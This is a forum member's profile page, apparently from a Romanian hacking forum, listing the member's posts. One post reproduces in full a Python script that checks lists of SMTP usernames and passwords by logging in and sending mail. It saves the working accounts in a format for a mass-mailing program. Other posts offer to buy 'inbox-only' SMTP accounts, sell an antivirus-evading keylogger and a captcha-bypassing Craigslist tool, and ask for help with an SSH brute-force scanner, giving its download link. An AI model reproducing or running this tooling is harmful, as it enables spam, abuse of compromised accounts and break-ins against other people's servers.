Jump to content

kgbonme

Members
  • Posts

    38
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

kgbonme's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. kgbonme

    Net AKTA

    Solutionare reclamatii | AKTA - Televiziune | Internet | Telefonie
  2. am ceva de genul #!/usr/bin/python #darkSMTPv.py #SMTP Checker - using Authentication #Coded by P47r1ck & low1z #----------------------------------- #... To be continued ... # # #THE CODE WILL TAKE A LIST OF SMTP ACCOUNTS IN THE FOLLOWING FORMAT (IP:USER:PASS) WILL TRY TO LOGIN AND THEN SEND #EMAIL TO THE ADDRESS THAT YOU CAN CHANGE ANYTIME IN THE CODE ( look below the #Create the message at the toaddr= # #EVERY WORKING SMTP ACCOUNT WILL PRINTED ON THE SCREEN WITH THE FOLLOWING MESSAGE : [!] Email Sent Successfully: IP USER PASS # #THE CODE HAS THE FOLLOWING FEATURES. # # 1. IT WILL SAVE THE LIST OF WORKING SMTP ACCOUNTS TO FILE OUTPUT THAT YOU WILL CHOOSE. # 2. YOU CAN ALSO SPECIFY THE EMAIL WHERE THE SMTP CAN SEND THE TEST EMAIL. # 3. IT WILL MAKE A LIST OF SERVERS FOR THE AMS (ADVANCED MASS SENDER PROGRAM), SO YOU CAN INSERT MORE EASIER THE SMTP #LIST INTO THE AMS.INI FILE FROM THE AMS PROGRAM. (LIST IS SAVED TO AMSlist.txt) # # # MORE FEATURES ARE COMING SOON!!! import sys, smtplib, socket, time, random from smtplib import SMTP from random import choice socket.setdefaulttimeout(5) # smtp default timeout, change number to speed up large lists def printHelp(): print '\nHow to use it ? There you go -- > ./darkSMTPv.py <accounts> <outputfile>' print '\nImportant: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS\n' # Create the message fromaddr = "test@test.com" toaddr = "test@gmail.com" def rndstr(): rndstr = '' for x in range(0,6): rndstr += str(random.choice(range(0,5))) return rndstr rs = rndstr() message = """To: %s From: %s Subject: %s test email """ % (toaddr,fromaddr,str(rs)) print "\n _ _ _____ __ __ _______ _____ " print " | | | | / ____| \/ |__ __| __ \ " print " __| | __ _ _ __| | _| (___ | \ / | | | | |__) |_ __" print " / _` |/ _` | '__| |/ /\___ \| |\/| | | | | ___/\ \ / /" print "| (_| | (_| | | | < ____) | | | | | | | | \ V / " print " \__,_|\__,_|_| |_|\_\_____/|_| |_| |_| |_| \_/ \n" print "\n This is not stopping here! ... To be continued." print "More features will be added soon. For bugs p47r1ckro[at]gmail[dot]com\n" print "_______________________________________________________________________" def timer(): now = time.localtime(time.time()) return time.asctime(now) def sendchk(listindex, host, user, password, info): # seperated function for checking try: smtp = smtplib.SMTP(host) smtp.login(user, password) code = smtp.ehlo()[0] if not (200 <= code <= 299): raise SMTPHeloError(code, resp) smtp.sendmail(fromaddr, toaddr, message) print "\n\t[!] Sending successful:",host, user, password print "\t[!] Message Sent Successfully\n" if info != '': LSstring = host+":"+user+":"+password+":"+info+"\n" else: LSstring = host+":"+user+":"+password+"\n" nList.append(LSstring) # special list for AMS file ID's LFile = open(output, "a") LFile.write(LSstring) # save working host/usr/pass to file LFile.close() AMSout = open("AMSlist.txt", "a") AMSout.write("[Server"+str(nList.index(LSstring))+"]\nName="+str(host)+"\nPort=25\nUserID=User\nBccSize=50\nUserName="+str(user)+"\nPassword="+str(password)+"\nAuthType=0\n\n") smtp.quit() except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg: print "[-] Login Failed:", host, user, password pass if len(sys.argv) != 3: printHelp() exit(1) # Do not change anything below. accounts = sys.argv[1] output = sys.argv[2] try: handle = list(open(accounts)) except: print"\n[+] We were unable to open the SMTP filelist. Check again your path and try again." print"\n[+] Exiting...." nList = [] for line in handle: host = line.split(':')[0] user = line.split(':')[1].replace('\n', '') if line.count(':') == 2: try: password = line.split(':')[2].replace('\n', '') sendchk(handle.index(line), host, user, password, info='') except: print '\n[+] We have found a error in your accounts list' print host, user exit(1) elif line.count(':') == 3: try: password = line.split(':')[2] info = line.split(':')[3].replace('\n', '') sendchk(handle.index(line), host, user, password, info) except: print '\n[+] We have found a error in your accounts list' print host, user exit(1) else: print '\n[!] IMPORTANT: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP,USER,PASS' print '\n[-] Exiting....\n' print "[!] Ended at: " + timer() + "\n" print "\n[!] You should visit forum.darkc0de.com from time to time" vreau sa-mi trimita email cu ip-ul smtp-ului cu care a trimis (folosit) pt sortare msk
  3. cumpar smtp-uri numai inbox se face proba prima data msk
  4. Salut..as avea nevoie si eu de program pt craiglist...spune-mi te rog cat mar costa si cum as putea sa-l testez...eventual da-mi add pe ilascodrin20 . stima

  5. daca vreti prg verificat si teste contact me e facut in python si trece de captcha
  6. eu am cumparat e varza si e UD sa nu te gandesti ca e fud also astia de la support sunt praf daca vrei un keylogger si nu preturi cum sunt la spytector si serverul e fud nu mai e nevoie de crypter da-mi pm
  7. pe alt browser merge numai sa nu intri din aol direct
  8. am instalat pe o partitie ubuntu 11.04 (pt a rula un ssh scanner) am downloadat cristina am dat toate cmd, prima data imi scana si cand ajungea la brute imi iesea (nu conteaza clasa de ip-uri la toate face la fel) akm cand dau start imi da : start :line 15 : 1737 illegal instruction sleep 1 start : line 16 1738 segmentation fault ././pscan2 $1 22 start : line 18 1739 segmentation fault ./sshd 100 start: line 21: 1742 illegal instruction sleep 10 cum rez problema si cum fac sa mearga? multumesc
  9. salut, am instalat pe o partitie Ubuntu si rulez sub windows cu VirtualBox-4.1.0-73009-Win toate bune pana aici am luat un scanner (http://freewebs.com/gbl-net/cristina.tgz) am dat toate comenziile imi scaneaza ip-urile si cand scaneaza cu pass imi sta 10 secunde si dupa ma baga in cd ce tree facut? msk
  10. salut, am un script in python si vreau sa stiu cum generezi random strings mai multe info pe private msk
  11. cum are extensia ? il are cineva instalat?
  12. imi da eroare Parse error: syntax error, unexpected T_VARIABLE in test/prb.php on line 12
×
×
  • Create New...